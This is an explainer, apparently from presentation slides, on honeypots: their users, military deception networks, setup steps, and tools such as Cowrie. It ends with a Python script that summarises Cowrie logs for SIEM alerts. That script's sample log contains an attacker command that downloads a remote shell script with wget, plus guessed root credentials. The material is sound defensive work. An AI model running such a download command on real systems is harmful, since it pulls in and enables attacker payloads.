CyberSecurity
APT: Advanced Persistent Threat
A honeypot is a system or service deliberately set up to appear real and attractive to attackers; its main purpose is to lure them in, monitor their actions, and gather intelligence about their techniques, not to protect sensitive data.
1️⃣ Large Enterprises
— Banks, telecoms, healthcare, and critical infrastructure providers.
— Example: Banks use honeypots to detect fraud & targeted attacks early.
2️⃣ Security Operations Centers (SOCs)
— Blue teams integrate honeypots into their detection & response workflows.
3️⃣ Government & Military
— Agencies (like NSA, CERTs) use them to study nation-state threats & cyber-espionage.
4️⃣ Cybersecurity Vendors & MSSPs
— Many Managed Security Service Providers offer deception-as-a-service.
5️⃣ Universities & Research Labs
— To monitor global attack trends & publish findings.
— Example: The Honeynet Project (global non-profit initiative).
6️⃣ Law Enforcement Agencies
— To trap and trace criminals, gather evidence, and understand underground ecosystems.
Militaries use honeypots as fishing hooks for hackers.
✅ Detect nation-state attackers early.
✅ Study enemy cyber weapons & tactics.
✅ Waste adversary resources & time.
✅ Support cyber counterintelligence & attribution.
How do militaries use them?
1️⃣ Strategic Placement
— Honeypots are deployed on networks that appear to hold sensitive or classified data, e.g., fake command servers or dummy weapons control systems.
— Placed both internally (to catch insiders) and externally (to lure foreign attackers).
2️⃣ High-Interaction Honeypots
— Militaries often deploy high-interaction honeypots: full-fledged systems running real services, so attackers engage fully and reveal their techniques.
3️⃣ Honeynets & Decoy Networks
— Set up entire fake military networks (honeynets), mimicking real infrastructure (e.g., mock radar stations, satellite links, SCADA/ICS systems).
4️⃣ Integration with Intelligence
— Data collected from honeypots feeds into cyber threat intelligence (CTI) and is shared with allies.
— Used to attribute attacks to specific actors (nation-states, APTs).
5️⃣ Monitoring & Attribution
— Sessions are monitored, recorded, and analyzed in detail to understand the attacker’s tools, techniques, and intent — supporting both defense and offensive cyber operations.
6️⃣ Legal & Controlled
— Usually isolated from real operational networks, ensuring no real damage or data leakage if compromised.
Define the purpose of the honeypot:
Detect intrusions.
Study attacker behavior or malware.
Gather threat intelligence.
Distract and delay attackers.
Clearly identify what you want to achieve and what type of attackers you aim to attract.
Low-Interaction — Simulates only a few services; safer and easier to manage.
High-Interaction — Runs a full OS & services; more realistic but riskier.
Honeynet — A network of honeypots that mimics a real environment.
Use an isolated or segmented network.
Deploy in a sandbox or virtualized setup.
Harden the honeypot OS & services to prevent real compromise.
Recommended tools:
Honeyd — Emulates hosts & services.
Cowrie — SSH/Telnet honeypot.
KFSensor — Windows-based honeypot.
Custom real systems configured as traps.
Enable comprehensive logging (keystrokes, commands, traffic).
Integrate with SIEM or IDS/IPS.
Use out-of-band logging to avoid tampering.
Place in the appropriate network zone (DMZ, internal, or cloud).
Make it discoverable but believable.
Monitor continuously and analyze captured data.
Regularly update configurations and patches.
Review and learn from logs and attacker behavior.
Improve deception techniques over time.
Keep honeypots isolated from critical systems.
Use realistic configurations and naming.
Document scenarios and findings carefully.
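As an added example (not part of the original slides), a small Python script that puts the logging and SIEM-integration step into practice for the Cowrie SSH/Telnet honeypot listed above: it groups Cowrie-style JSON events by session and ranks each session for an alert, since any contact with a honeypot is suspect. The event and field names are assumed from Cowrie's JSON log format; the sample lines and addresses are constructed.

```python
import json

# Constructed sample shaped like Cowrie's JSON log; event/field names (eventid,
# session, src_ip, username, password, input) are assumed from Cowrie's format.
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"203.0.113.7","timestamp":"2024-01-01T10:00:00Z"}
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.7","username":"root","password":"123456","timestamp":"2024-01-01T10:00:01Z"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.7","username":"root","password":"toor","timestamp":"2024-01-01T10:00:02Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"uname -a","timestamp":"2024-01-01T10:00:03Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"wget http://198.51.100.9/x.sh","timestamp":"2024-01-01T10:00:04Z"}
{"eventid":"cowrie.session.closed","session":"a1","src_ip":"203.0.113.7","timestamp":"2024-01-01T10:00:05Z"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"198.51.100.3","timestamp":"2024-01-01T10:05:00Z"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"198.51.100.3","username":"admin","password":"admin","timestamp":"2024-01-01T10:05:01Z"}
"""

def summarize_sessions(log_text):
    """Group Cowrie events by session id into one record per attacker session."""
    sessions = {}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        rec = sessions.setdefault(ev["session"], {
            "src_ip": ev.get("src_ip"), "failed_logins": 0,
            "credentials": None, "commands": []})
        eid = ev["eventid"]
        if eid == "cowrie.login.failed":
            rec["failed_logins"] += 1
        elif eid == "cowrie.login.success":
            rec["credentials"] = (ev["username"], ev["password"])
        elif eid == "cowrie.command.input":
            rec["commands"].append(ev["input"])
    return sessions

def build_alerts(sessions):
    """Any contact with a honeypot is suspect; rank by how far the attacker got."""
    order = ["high", "medium", "low"]
    alerts = []
    for sid, rec in sessions.items():
        if rec["commands"]:
            severity = "high"    # post-login interactive activity captured
        elif rec["credentials"]:
            severity = "medium"  # logged in but issued no commands yet
        else:
            severity = "low"     # credential guessing / scanning only
        alerts.append({"session": sid, "src_ip": rec["src_ip"], "severity": severity,
                       "failed_logins": rec["failed_logins"], "commands": rec["commands"]})
    return sorted(alerts, key=lambda a: order.index(a["severity"]))
```

Each alert record is a flat JSON-serialisable dict, so it can be forwarded as-is to a SIEM over the honeypot's out-of-band logging channel.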
Dr. Ghoniem Lawaty
Tech Evangelist @TechHuB Egypt